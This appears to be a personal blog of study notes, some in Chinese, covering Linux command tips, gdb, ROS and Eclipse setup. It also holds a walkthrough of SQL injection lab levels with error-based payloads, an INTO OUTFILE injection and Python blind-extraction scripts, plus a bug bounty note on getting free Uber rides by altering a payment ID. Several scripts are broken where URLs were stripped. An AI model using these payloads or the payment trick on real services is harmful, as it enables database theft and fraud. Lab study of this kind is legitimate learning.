Algorithm study notes




A general recursive template for backtracking:

   helper (parameters of given data and current recursive level) {
        // Handle base cases, i.e. the last level of recursive call
        if (level == lastLevel) {
            record result;
            return sth;
        // Otherwise permute every possible value for this level.
        for (every possible value for this level) {
            helper(parameters of given data and next recursive level);
        return sth;


some interesting linux command

1. Supervise command (run every 2s)

watch "ls -larth"

2. Kill program using one port

sudo fuser -k 8000/tcp

3. Limit memory usage for following commands

ulimit -Sv 1000       # 1000 KBs = 1 MB
ulimit -Sv unlimited  # Remove limit

4. Rename selected files using a regular expression

rename 's/\.bak$/.txt/' *.bak

5. Get full path of file

readlink -f file.txt

6. List contents of tar.gz and extract only one file

tar tf file.tgz
tar xf file.tgz filename

7. List files by size

ls -lS

8. Nice trace route


9. Find files tips

find . -size 20c             # By file size (20 bytes)
find . -name "*.gz" -delete  # Delete files
find . -exec echo {} \;      # One file by line
find . -exec echo {} \+      # All in the same line
./file1 ./file2 ./file3

10. Print text ad infinitum

yes hello

11. Who is logged in?


12. Prepend line number

ls | nl

13. Grep with Perl like syntax (allows chars like \t)

grep -P "\t"

14. Cat backwards (starting from the end)

tac file

15. Check permissions of each directory to a file

It is useful to detect permissions errors, for example when configuring a web server.

namei -l /path/to/file.txt

16. Run command every time a file is modified

while inotifywait -e close_write document.tex

17. Copy to clipboard

cat file.txt | xclip -selection clipboard

18. Spell and grammar check in Latex

detex file.tex | diction -bs

You may need to install the following: sudo apt-get install diction texlive-extra-utils.

19. Check resources’ usage of command

/usr/bin/time -v ls

20. Randomize lines in file

cat file.txt | sort -R
cat file.txt | sort -R | head  # Pick a random sambple

# Even better (suggested by xearl in Hacker news):
shuf file.txt

21. Keep program running after leaving SSH session

If the program doesn’t need any interaction:

nohup ./ &

If you need to enter some input manually and then want to leave:

<Type any input you want>
<Ctrl-Z>          # send process to sleep
jobs -l           # find out the job id
disown -h jobid   # disown job
bg                # continue running in the background

Of course, you can also use screen or tmux for this purpose.

22. Run a command for a limited time

timeout 10s ./

# Restart every 30 minutes
while true; do timeout 30m ./; done

23. Combine lines from two sorted files

comm file1 file2

Prints these three columns:

  1. Lines unique to file1.
  2. Lines unique to file2.
  3. Lines both in file1 and file2.

With options -1, -2, -3, you can remove each of these columns.

24. Split long file in files with same number of lines

split -l LINES -d file.txt output_prefix

25. Flush swap partition

If a program eats too much memory, the swap can get filled with the rest of the memory and when you go back to normal, everything is slow. Just restart the swap partition to fix it:

sudo swapoff -a
sudo swapon -a

26. Fix ext4 file system with problems with its superblock

sudo fsck.ext4 -f -y /dev/sda1
sudo fsck.ext4 -v /dev/sda1
sudo mke2fs -n /dev/sda1
sudo e2fsck -n <first block number of previous list> /dev/sda1

27. Create empty file of given size

fallocate -l 1G test.img

28. Manipulate PDFs from the command line

To join, shuffle, select, etc. pdftk is a great tool:

pdftk *.pdf cat output all.pdf        # Join PDFs together
pdftk A=in.pdf cat A5 output out.pdf  # Extract page from PDF

You can also manipulate the content with cpdf:

cpdf -draft in.pdf -o out.pdf      # Remove images
cpdf -blacktext in.pdf -o out.pdf  # Convert all text to black color

29. Monitor the progress in terms of generated output

# Write random data, encode it in base64 and monitor how fast it
# is being sent to /dev/null
cat /dev/urandom | base64 | pv -lbri2 > /dev/null

# pv options:
#   -l,  lines
#   -b,  total counter
#   -r,  show rate
#   -i2, refresh every 2 seconds

30. Find packages that have a given file in Ubuntu

apt-file update
apt-file search dir/file.h





1、error based string sqli


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$row = mysql_fetch_array($result);
  	echo "&lt;font size='5' color= '#99FF00'&gt;";
  	echo 'Your Login name:'. $row['username'];
  	echo "
  	echo 'Your Password:' .$row['password'];
  	echo "&lt;/font&gt;";
	echo '&lt;font color= "#FFFF00"&gt;';
	echo "&lt;/font&gt;";  


原理其实比较简单,一般都是利用某函数X    比如X(exp)  mysql函数在执行的时候会先执行函数里面的exp,获取返回值,然后再把exp的返回值作为参数给X进行执行,当exp的返回值不符合X的传参要求时,会导致query错误,打印出错误。

直接贴上一个老毛子整理的error based的cheat sheet:

构造exp:‘|polygon((select*from(select name_const(version(),1))x))%23

2、error based integer sqli


exp:|polygon((select*from(select name_const(version(),1))x))%23


exp:’)|polygon((select*from(select name_const(version(),1))x))%23

4 、双引号加括号的error based 注入,变下exp即可:

exp: “)|polygon((select*from(select name_const(version(),1))x))%23

5、string 单引号注入同第一题

exp: ‘ |polygon((select*from(select name_const(version(),1))x))%23

6、string 双引号注入

exp: “|polygon((select*from(select name_const(version(),1))x))%23



这句话表示不再显示具体错误,只会显示“You have an error in your SQL syntax“,所以这里我们不能用前几题的error based注入,根据标题的提示“dump into outfile”, 由于我权限设置的原因,apache用户无法写入文件,这里直接给出exp了:

1′)) union select 1,2,3 into outfile “/tmp/test.txt”  –-+

8、布尔型的盲注,这里我们通过and 1=1、and 1=2进行判断:

?id=1’+and+1=1–+ 和id=1相同回显

?id=1’+and+1=2–+ 和id=1不同回显


import requests
payload = '0123456789.abcdefghijklmnopqrstuvwxyz'

for posi in range(20):
    for asc in payload:
        url = "\'+AND ASCII(SUBSTRING(version(),%d,1))=%d--+" \
              % (posi, ord(asc))
        result = requests.get(url)
        #print url
        if "You are in" in result.content:
            print asc,


mysql中主要有sleep和benchmark两个函数,sql server中有wait for time和wait for delay两个。时间盲注大体上和布尔型盲注相同,这里我们判断语句是否执行是通过mysql数据库延时返回造成我们的http响应延时。


import requests
import time
payload = '0123456789.abcdefghijklmnopqrstuvwxyz'

for posi in range(20):
    for asc in payload:
        FirstRun = int(time.time())
        url = "\'" \
              "+AND+IF(ASCII(SUBSTRING(version(),%d,1))=%d,SLEEP(5),0)--+" \
              % (posi, ord(asc))
        result = requests.get(url)
        SecondRun = int(time.time())
        #print url
        #print SecondRun,FirstRun
        if SecondRun - FirstRun > 1:
            print asc,






exp: uname=admin&passwd=’)/updatexml(0,repeat(version(),2),0)#


exp: uname=admin&passwd=”/updatexml(0,repeat(version(),2),0)#

15、post 布尔型盲注

exp script:

import requests
payload = '0123456789.abcdefghijklmnopqrstuvwxyz'

for posi in range(20):
    for asc in payload:
        url = ""
        payload = "admin\' AND ASCII(SUBSTRING(version(),%d,1))=%d#" \
              % (posi, ord(asc))
        data = {'uname':'admin', 'passwd': payload}
        result =,data=data)
        #print data
        if "flag.jpg" in result.content:
            print asc,

16、post 时间盲注




最近投了一堆安全的summer intern,结果不是被拒就是杳无音讯,一个oa或者是电面的机会都没有,自己也实在提不起兴趣找SDE的工作。然后回顾自己去年一年,在学校挣扎着完成课程和在实验室写写代码,安全方面似乎没有丝毫的进步。



眼看着自己还有一年就要毕业了,虽然说找到一个工作不是什么难事,但是自己浑浑噩噩的样子自己实在看不过去,这里自己做一个小小的计划,踏踏实实从零开始学习安全,然后自己的学习过程都用博客进行记录。对于遇到的每个问题都仔细研究,深入了解原理,learn it and hack it。



2、CVE web类漏洞

3、bug bounty



bug bounty note—-UBER

free uber:

POST /api/dial/v2/requests HTTP/1.1 Host: {“start_latitude”:12.925151699999999,”start_longitude”:77.6657536,

change payment_method_id

reference url :

install eclipse on ubuntu 14.04

before install, you should update your JRE and JDK to 8:

Final Update


sudo apt-get install openjdk-8-jdk


sudo apt-get install openjdk-8-jre

Old Update

I found two repository but I do not recommend

  • OpenJDK builds (all archs)
  • OpenJDK 8 backport for trusty

Original Message

If you really want to use OpenJDK, you have to compile from source. There is not still any PPA for OpenJDK.

It has been requested at

I recommend you to use Webup8 Oracle Java8 Installer

sudo add-apt-repository ppa:webupd8team/java -y
sudo apt-get update
sudo apt-get install oracle-java8-installer

To automatically set up the Java 8 environment variables

sudo apt-get install oracle-java8-set-default

Check it

java -version

So you have to wait to use OpenJDK8


Then download eclipse from

unpack and install it

ROS study note

You can choose any editor you like to implement you ROS project. There are some official IDE configuration for ROS :

I prefer using VIM. There is an VIM plugin named rosvim we can use. To install it:

(I use spf13-vim so it uses vundle to manage VIM plugin)

$ echo Bundle \'taketwo/vim-ros\' >> ~/.vimrc.bundles.local
$ vim +BundleInstall! +BundleClean +q

When I run roscore (ROS master) on the sensor, then I try to run “rosnode echo rosout” to print the information of the rosout. It show “Couldn’t find an AF_INET address for “. So we should set the ROS_IP on our host like “export ROS_IP=”.



编译的时候: -g

开始调试:gdb [-tui] test

设置断点:(gdb) breakpoint test.c:123 or  (gdb) b main

运行程序(后面可以跟参数):(gdb) run [arg1 arg2]

清除断点:(gdb) clear

跟踪堆栈:(gdb) where

打印参数:(gdb) print f.BlockType

用16进制打印:(gdb) print/x f.BlockType

单步调试(不进入函数内部):(gdb) next or (gdb) n

单步调试(进入函数内部):(gdb) step or (gdb) s

在每个命令后都显示参数:(gdb) display f.BlockType

设定参数:(gdb) set f.BlockType=0

继续运行:(gdb) cont

推出:(gdb) quit